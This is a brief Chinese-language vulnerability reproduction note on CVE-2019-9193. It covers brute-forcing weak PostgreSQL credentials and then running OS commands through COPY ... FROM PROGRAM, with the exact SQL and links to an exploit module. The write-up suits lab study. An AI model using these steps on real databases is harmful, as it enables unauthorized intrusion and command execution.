PostgreSQL从弱口令到RCE（CVE-2019-9193）

0x01 简介

PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”，管理员或具有“COPY TO/FROM PROGRAM”权限的用户，可以使用这个特性执行任意命令。

0x02 影响版本

postgresql 9.3-11

0x03 漏洞复现

1、使用“超级弱口令”爆破处postgresql数据库账号密码。

2、使用“Navicat Premium”连接postgresql数据库后执行下列语句。

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

命令执行成功。

3、通过MSF也可利用。
https://github.com/Greenwolf/postgres_cmd_execution_nine_three

0x04 参考

https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193